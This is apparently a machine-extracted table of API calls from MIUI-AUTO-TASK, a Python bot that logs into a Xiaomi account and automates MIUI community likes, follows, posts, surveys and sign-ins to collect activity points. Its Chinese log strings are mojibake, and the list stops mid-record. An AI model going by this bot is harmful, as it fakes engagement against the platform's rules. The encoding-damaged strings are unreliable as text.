[((19016, 19044), 'utils.utils.w_log', 'w_log', (['"""MIUI-AUTO-TASK v1.4"""'], {}), "('MIUI-AUTO-TASK v1.4')\n", (19021, 19044), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19049, 19087), 'utils.utils.w_log', 'w_log', (['"""---------- ็ณป็ปไฟกๆฏ -------------"""'], {}), "('---------- ็ณป็ปไฟกๆฏ -------------')\n", (19054, 19087), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19092, 19105), 'utils.utils.system_info', 'system_info', ([], {}), '()\n', (19103, 19105), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19110, 19148), 'utils.utils.w_log', 'w_log', (['"""---------- ้กน็ฎไฟกๆฏ -------------"""'], {}), "('---------- ้กน็ฎไฟกๆฏ -------------')\n", (19115, 19148), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19153, 19207), 'utils.utils.w_log', 'w_log', (['"""้กน็ฎๅฐๅ๏ผhttps://github.com/0-8-4/miui-auto-tasks"""'], {}), "('้กน็ฎๅฐๅ๏ผhttps://github.com/0-8-4/miui-auto-tasks')\n", (19158, 19207), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19212, 19240), 'utils.utils.w_log', 'w_log', (['"""ๆฌข่ฟ star๏ผๆ่ฐขๆฑ้ฒ็ ็ฉถๆไธญ็ๅคงไฝฌ"""'], {}), "('ๆฌข่ฟ star๏ผๆ่ฐขๆฑ้ฒ็ ็ฉถๆไธญ็ๅคงไฝฌ')\n", (19217, 19240), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19245, 19283), 'utils.utils.w_log', 'w_log', (['"""---------- ้
็ฝฎๆฃๆต -------------"""'], {}), "('---------- ้
็ฝฎๆฃๆต -------------')\n", (19250, 19283), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19302, 19314), 'utils.utils.get_config', 'get_config', ([], {}), '()\n', (19312, 19314), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17291, 17312), 'utils.utils.w_log', 'w_log', (['"""็ณป็ป่ฎพ็ฝฎไบไปฃ็๏ผๅบ็ฐๅผๅธธ"""'], {}), "('็ณป็ป่ฎพ็ฝฎไบไปฃ็๏ผๅบ็ฐๅผๅธธ')\n", (17296, 17312), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17422, 17453), 'utils.utils.w_log', 'w_log', (['"""ๆฌ่ๆฌๆฏๆ็คพๅบ็ญพๅฐ๏ผๅ ่ฏฅๅ่ฝๅญๅจ้ฃ้ฉ้ป่ฎค็ฆ็จ"""'], {}), "('ๆฌ่ๆฌๆฏๆ็คพๅบ็ญพๅฐ๏ผๅ ่ฏฅๅ่ฝๅญๅจ้ฃ้ฉ้ป่ฎค็ฆ็จ')\n", (17427, 17453), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17462, 17499), 'utils.utils.w_log', 'w_log', (['"""ๅฆๆจๆฟๆๆฟๆ
ไธๅๅฏ่ฝ็ๅๆ๏ผๅฏ็ผ่พ้
็ฝฎๆไปถๆๅจๆๅผ่ฏฅๅ่ฝ"""'], {}), "('ๅฆๆจๆฟๆๆฟๆ
ไธๅๅฏ่ฝ็ๅๆ๏ผๅฏ็ผ่พ้
็ฝฎๆไปถๆๅจๆๅผ่ฏฅๅ่ฝ')\n", (17467, 17499), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17603, 17623), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆปกๆๅบฆ่ฐๆฅไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆปกๆๅบฆ่ฐๆฅไปปๅก')\n", (17608, 17623), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17666, 17683), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆ็น่ตไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆ็น่ตไปปๅก')\n", (17671, 17683), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17762, 17777), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (17772, 17777), False, 'import time\n'), ((17822, 17837), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (17832, 17837), False, 'import time\n'), ((17889, 17910), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ
ณๆณจไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ
ณๆณจไปปๅก')\n", (17894, 17910), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18026, 18048), 'utils.utils.w_log', 'w_log', (['"""5็งๅ้ขๅๆดป่ทๅ_ๅ
ณๆณจไปปๅก"""'], {}), "('5็งๅ้ขๅๆดป่ทๅ_ๅ
ณๆณจไปปๅก')\n", (18031, 18048), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18057, 18070), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (18067, 18070), False, 'import time\n'), ((18122, 18143), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ ๅไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ ๅไปปๅก')\n", (18127, 18143), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18261, 18283), 'utils.utils.w_log', 'w_log', (['"""5็งๅ้ขๅๆดป่ทๅ_ๅ ๅไปปๅก"""'], {}), "('5็งๅ้ขๅๆดป่ทๅ_ๅ ๅไปปๅก')\n", (18266, 18283), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18292, 18305), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (18302, 18305), False, 'import time\n'), ((19327, 19347), 'utils.utils.check_config', 'check_config', (['config'], {}), '(config)\n', (19339, 19347), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19357, 19376), 'utils.utils.w_log', 'w_log', (['"""้
็ฝฎๆไปถๆฒกๆๆญฃ็กฎ้
็ฝฎ"""'], {}), "('้
็ฝฎๆไปถๆฒกๆๆญฃ็กฎ้
็ฝฎ')\n", (19362, 19376), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19420, 19441), 'utils.utils.format_config', 'format_config', (['config'], {}), '(config)\n', (19433, 19441), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19488, 19531), 'utils.utils.w_log', 'w_log', (['"""---------- EXECUTING -------------"""'], {}), "('---------- EXECUTING -------------')\n", (19493, 19531), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((687, 796), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/post/thumbUp?postId=28270729"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/post/thumbUp?postId=28270729',\n headers=headers)\n", (699, 796), False, 'import requests\n'), ((1060, 1073), 'utils.utils.w_log', 'w_log', (['"""็น่ตๆๅ"""'], {}), "('็น่ตๆๅ')\n", (1065, 1073), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1289, 1405), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/post/cancelThumbUp?postId=28270729"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/post/cancelThumbUp?postId=28270729'\n , headers=headers)\n", (1301, 1405), False, 'import requests\n'), ((1672, 1687), 'utils.utils.w_log', 'w_log', (['"""ๅๆถ็น่ตๆๅ"""'], {}), "('ๅๆถ็น่ตๆๅ')\n", (1677, 1687), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((3547, 3655), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/community/post/add/newAnnounce"""'], {'headers': 'headers', 'data': 'data'}), "('https://api.vip.miui.com/api/community/post/add/newAnnounce',\n headers=headers, data=data)\n", (3560, 3655), False, 'import requests\n'), ((3943, 3971), 'json.loads', 'json.loads', (["r_json['entity']"], {}), "(r_json['entity'])\n", (3953, 3971), False, 'import json\n'), ((4145, 4158), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (4155, 4158), False, 'import time\n'), ((4956, 5087), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/mtop/planet/vip/content/addCommentReturnCommentInfo"""'], {'headers': 'headers', 'data': 'data'}), "(\n 'https://api.vip.miui.com/mtop/planet/vip/content/addCommentReturnCommentInfo'\n , headers=headers, data=data)\n", (4969, 5087), False, 'import requests\n'), ((5351, 5364), 'utils.utils.w_log', 'w_log', (['"""ๅๅคๆๅ"""'], {}), "('ๅๅคๆๅ')\n", (5356, 5364), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5516, 5537), 'http.cookiejar.CookieJar', 'cookiejar.CookieJar', ([], {}), '()\n', (5535, 5537), False, 'from http import cookiejar\n'), ((5560, 5597), 'urllib.request.HTTPCookieProcessor', 'request.HTTPCookieProcessor', (['r_cookie'], {}), '(r_cookie)\n', (5587, 5597), False, 'from urllib import request\n'), ((5619, 5648), 'urllib.request.build_opener', 'request.build_opener', (['handler'], {}), '(handler)\n', (5639, 5648), False, 'from urllib import request\n'), ((6518, 6618), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/miui/dev/survey/submit"""'], {'headers': 'headers', 'data': 'data'}), "('https://api.vip.miui.com/api/miui/dev/survey/submit',\n headers=headers, data=data)\n", (6531, 6618), False, 'import requests\n'), ((6857, 6873), 'utils.utils.w_log', 'w_log', (['"""ๆปกๆๅบฆๆ็ฅจๆๅ"""'], {}), "('ๆปกๆๅบฆๆ็ฅจๆๅ')\n", (6862, 6873), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7104, 7198), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/miui/dev/survey?businessId=2"""'], {'headers': 'headers'}), "('https://api.vip.miui.com/api/miui/dev/survey?businessId=2',\n headers=headers)\n", (7116, 7198), False, 'import requests\n'), ((7930, 8055), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/user/relation/unfollow?followeeId=210836962"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/user/relation/unfollow?followeeId=210836962'\n , headers=headers)\n", (7942, 8055), False, 'import requests\n'), ((8322, 8337), 'utils.utils.w_log', 'w_log', (['"""ๅๅ
ณ็จๆทๆๅ"""'], {}), "('ๅๅ
ณ็จๆทๆๅ')\n", (8327, 8337), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8562, 8685), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/user/relation/follow?followeeId=210836962"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/user/relation/follow?followeeId=210836962'\n , headers=headers)\n", (8574, 8685), False, 'import requests\n'), ((8948, 8963), 'utils.utils.w_log', 'w_log', (['"""ๅ
ณๆณจ็จๆทๆๅ"""'], {}), "('ๅ
ณๆณจ็จๆทๆๅ')\n", (8953, 8963), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9191, 9302), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/board/unfollow?boardId=5462662"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/board/unfollow?boardId=5462662',\n headers=headers)\n", (9203, 9302), False, 'import requests\n'), ((9570, 9585), 'utils.utils.w_log', 'w_log', (['"""้ๅบๅๅญๆๅ"""'], {}), "('้ๅบๅๅญๆๅ')\n", (9575, 9585), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9811, 9920), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/board/follow?boardId=5462662"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/board/follow?boardId=5462662',\n headers=headers)\n", (9823, 9920), False, 'import requests\n'), ((10152, 10167), 'utils.utils.w_log', 'w_log', (['"""ๅ ๅ
ฅๅๅญๆๅ"""'], {}), "('ๅ ๅ
ฅๅๅญๆๅ')\n", (10157, 10167), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10494, 10622), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/community/user/task/start?version=dev.210805"""'], {'headers': 'headers', 'data': 'data'}), "(\n 'https://api.vip.miui.com/api/community/user/task/start?version=dev.210805'\n , headers=headers, data=data)\n", (10507, 10622), False, 'import requests\n'), ((10896, 10914), 'utils.utils.w_log', 'w_log', (['"""ๅผๅงๆดป่ทๅไปปๅกๆๅ"""'], {}), "('ๅผๅงๆดป่ทๅไปปๅกๆๅ')\n", (10901, 10914), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11267, 11397), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/community/user/task/acquire?version=dev.210805"""'], {'headers': 'headers', 'data': 'data'}), "(\n 'https://api.vip.miui.com/api/community/user/task/acquire?version=dev.210805'\n , headers=headers, data=data)\n", (11280, 11397), False, 'import requests\n'), ((11667, 11683), 'utils.utils.w_log', 'w_log', (['"""้ขๅๆดป่ทๅๆๅ"""'], {}), "('้ขๅๆดป่ทๅๆๅ')\n", (11672, 11683), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12068, 12157), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/carrot/pull"""'], {'headers': 'headers', 'data': 'data'}), "('https://api.vip.miui.com/api/carrot/pull', headers=headers,\n data=data)\n", (12081, 12157), False, 'import requests\n'), ((12437, 12455), 'utils.utils.w_log', 'w_log', (['"""็คพๅบๆ่ๅ็ญพๅฐๆๅ"""'], {}), "('็คพๅบๆ่ๅ็ญพๅฐๆๅ')\n", (12442, 12455), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((15572, 15688), 'requests.post', 'requests.post', (['"""https://account.xiaomi.com/pass/serviceLoginAuth2"""'], {'headers': 'headers', 'data': 'data', 'proxies': 'proxies'}), "('https://account.xiaomi.com/pass/serviceLoginAuth2', headers=\n headers, data=data, proxies=proxies)\n", (15585, 15688), False, 'import requests\n'), ((15824, 15849), 'json.loads', 'json.loads', (['response_data'], {}), '(response_data)\n', (15834, 15849), False, 'import json\n'), ((16344, 16359), 'utils.utils.w_log', 'w_log', (['"""่ดฆๅท็ปๅฝๅฎๆ"""'], {}), "('่ดฆๅท็ปๅฝๅฎๆ')\n", (16349, 16359), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16765, 16857), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/mtop/planet/vip/betaTest/score"""'], {'headers': 'headers'}), "('https://api.vip.miui.com/mtop/planet/vip/betaTest/score',\n headers=headers)\n", (16777, 16857), False, 'import requests\n'), ((17533, 17557), 'utils.utils.w_log', 'w_log', (['"""้ฃ้ฉๅ่ฝๆ็คบ๏ผๆญฃๅจ่ฟ่ก็คพๅบ็ญพๅฐ"""'], {}), "('้ฃ้ฉๅ่ฝๆ็คบ๏ผๆญฃๅจ่ฟ่ก็คพๅบ็ญพๅฐ')\n", (17538, 17557), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18387, 18410), 'utils.utils.w_log', 'w_log', (['"""้ฃ้ฉๅ่ฝๆ็คบ๏ผๅขๅผบๆจกๅผๅทฒๅฏ็จ"""'], {}), "('้ฃ้ฉๅ่ฝๆ็คบ๏ผๅขๅผบๆจกๅผๅทฒๅฏ็จ')\n", (18392, 18410), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18423, 18446), 'utils.utils.w_log', 'w_log', (['"""ๅขๅผบๆจกๅผๅทฒๅฏ็จ๏ผๅญๅจๅฐๅท้ฃ้ฉ"""'], {}), "('ๅขๅผบๆจกๅผๅทฒๅฏ็จ๏ผๅญๅจๅฐๅท้ฃ้ฉ')\n", (18428, 18446), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18504, 18524), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆBUGๅ้ฆไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆBUGๅ้ฆไปปๅก')\n", (18509, 18524), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18577, 18596), 'utils.utils.w_log', 'w_log', (['"""3็งๅๆง่กๆๅปบ่ฎฎไปปๅก"""'], {}), "('3็งๅๆง่กๆๅปบ่ฎฎไปปๅก')\n", (18582, 18596), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18656, 18669), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (18666, 18669), False, 'import time\n'), ((18682, 18700), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆๅปบ่ฎฎไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆๅปบ่ฎฎไปปๅก')\n", (18687, 18700), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18753, 18774), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆดป่ทๅ_ๅๅธไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆดป่ทๅ_ๅๅธไปปๅก')\n", (18758, 18774), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18872, 18894), 'utils.utils.w_log', 'w_log', (['"""5็งๅ้ขๅๆดป่ทๅ_ๅๅธไปปๅก"""'], {}), "('5็งๅ้ขๅๆดป่ทๅ_ๅๅธไปปๅก')\n", (18877, 18894), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18907, 18920), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (18917, 18920), False, 'import time\n'), ((922, 944), 'utils.utils.w_log', 'w_log', (['"""็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (927, 944), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1117, 1130), 'utils.utils.w_log', 'w_log', (['"""็น่ตๅบ้"""'], {}), "('็น่ตๅบ้')\n", (1122, 1130), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1143, 1151), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (1148, 1151), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1530, 1554), 'utils.utils.w_log', 'w_log', (['"""ๅๆถ็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅๆถ็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (1535, 1554), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1731, 1746), 'utils.utils.w_log', 'w_log', (['"""ๅๆถ็น่ตๅบ้"""'], {}), "('ๅๆถ็น่ตๅบ้')\n", (1736, 1746), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1759, 1767), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (1764, 1767), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((2150, 2174), 'utils.utils.w_log', 'w_log', (['"""ๅ ้คๅ
ๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅ ้คๅ
ๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (2155, 2174), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((2377, 2398), 'utils.utils.w_log', 'w_log', (['"""ๅ ้คๅ
ๅฎนๅบ้๏ผ่ฏทๆๅจๅ ้ค"""'], {}), "('ๅ ้คๅ
ๅฎนๅบ้๏ผ่ฏทๆๅจๅ ้ค')\n", (2382, 2398), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((2411, 2419), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (2416, 2419), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((3787, 3811), 'utils.utils.w_log', 'w_log', (['"""ๅ่กจๅ
ๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅ่กจๅ
ๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (3792, 3811), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((4329, 4344), 'utils.utils.w_log', 'w_log', (['"""ๅ่กจๅ
ๅฎนๅบ้"""'], {}), "('ๅ่กจๅ
ๅฎนๅบ้')\n", (4334, 4344), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((4357, 4365), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (4362, 4365), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5213, 5235), 'utils.utils.w_log', 'w_log', (['"""ๅๅคๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅๅคๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (5218, 5235), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5408, 5421), 'utils.utils.w_log', 'w_log', (['"""ๅๅคๅบ้"""'], {}), "('ๅๅคๅบ้')\n", (5413, 5421), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5434, 5442), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (5439, 5442), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6149, 6157), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (6154, 6157), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6713, 6738), 'utils.utils.w_log', 'w_log', (['"""ๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (6718, 6738), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6917, 6933), 'utils.utils.w_log', 'w_log', (['"""ๆปกๆๅบฆๆ็ฅจๅบ้"""'], {}), "('ๆปกๆๅบฆๆ็ฅจๅบ้')\n", (6922, 6933), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6946, 6954), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (6951, 6954), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7293, 7319), 'utils.utils.w_log', 'w_log', (['"""่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (7298, 7319), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7737, 7762), 'utils.utils.w_log', 'w_log', (['"""่ทๅ้ฎๅทIDๅบ้๏ผๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ"""'], {}), "('่ทๅ้ฎๅทIDๅบ้๏ผๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ')\n", (7742, 7762), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7775, 7783), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (7780, 7783), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8180, 8204), 'utils.utils.w_log', 'w_log', (['"""ๅๅ
ณ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅๅ
ณ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (8185, 8204), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8381, 8396), 'utils.utils.w_log', 'w_log', (['"""ๅๅ
ณ็จๆทๅบ้"""'], {}), "('ๅๅ
ณ็จๆทๅบ้')\n", (8386, 8396), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8409, 8417), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (8414, 8417), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8808, 8832), 'utils.utils.w_log', 'w_log', (['"""ๅ
ณๆณจ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅ
ณๆณจ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (8813, 8832), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9007, 9022), 'utils.utils.w_log', 'w_log', (['"""ๅ
ณๆณจ็จๆทๅบ้"""'], {}), "('ๅ
ณๆณจ็จๆทๅบ้')\n", (9012, 9022), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9035, 9043), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (9040, 9043), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9428, 9452), 'utils.utils.w_log', 'w_log', (['"""้ๅบๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('้ๅบๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (9433, 9452), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9629, 9644), 'utils.utils.w_log', 'w_log', (['"""้ๅบๅๅญๅบ้"""'], {}), "('้ๅบๅๅญๅบ้')\n", (9634, 9644), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9657, 9665), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (9662, 9665), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10010, 10034), 'utils.utils.w_log', 'w_log', (['"""ๅ ๅ
ฅๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅ ๅ
ฅๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (10015, 10034), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10211, 10226), 'utils.utils.w_log', 'w_log', (['"""ๅ ๅ
ฅๅๅญๅบ้"""'], {}), "('ๅ ๅ
ฅๅๅญๅบ้')\n", (10216, 10226), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10748, 10775), 'utils.utils.w_log', 'w_log', (['"""ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (10753, 10775), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10958, 10976), 'utils.utils.w_log', 'w_log', (['"""ๅผๅงๆดป่ทๅไปปๅกๅบ้"""'], {}), "('ๅผๅงๆดป่ทๅไปปๅกๅบ้')\n", (10963, 10976), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10989, 10997), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (10994, 10997), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11523, 11548), 'utils.utils.w_log', 'w_log', (['"""้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (11528, 11548), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11727, 11743), 'utils.utils.w_log', 'w_log', (['"""้ขๅๆดป่ทๅๅบ้"""'], {}), "('้ขๅๆดป่ทๅๅบ้')\n", (11732, 11743), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11756, 11764), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (11761, 11764), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12289, 12316), 'utils.utils.w_log', 'w_log', (['"""็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (12294, 12316), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12499, 12517), 'utils.utils.w_log', 'w_log', (['"""็คพๅบๆ่ๅ็ญพๅฐๅบ้"""'], {}), "('็คพๅบๆ่ๅ็ญพๅฐๅบ้')\n", (12504, 12517), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12530, 12538), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (12535, 12538), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((15906, 15933), 'utils.utils.w_log', 'w_log', (['"""ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ็จๆทๅๆๅฏ็ ไธๆญฃ็กฎ"""'], {}), "('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ็จๆทๅๆๅฏ็ ไธๆญฃ็กฎ')\n", (15911, 15933), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16015, 16050), 'utils.utils.w_log', 'w_log', 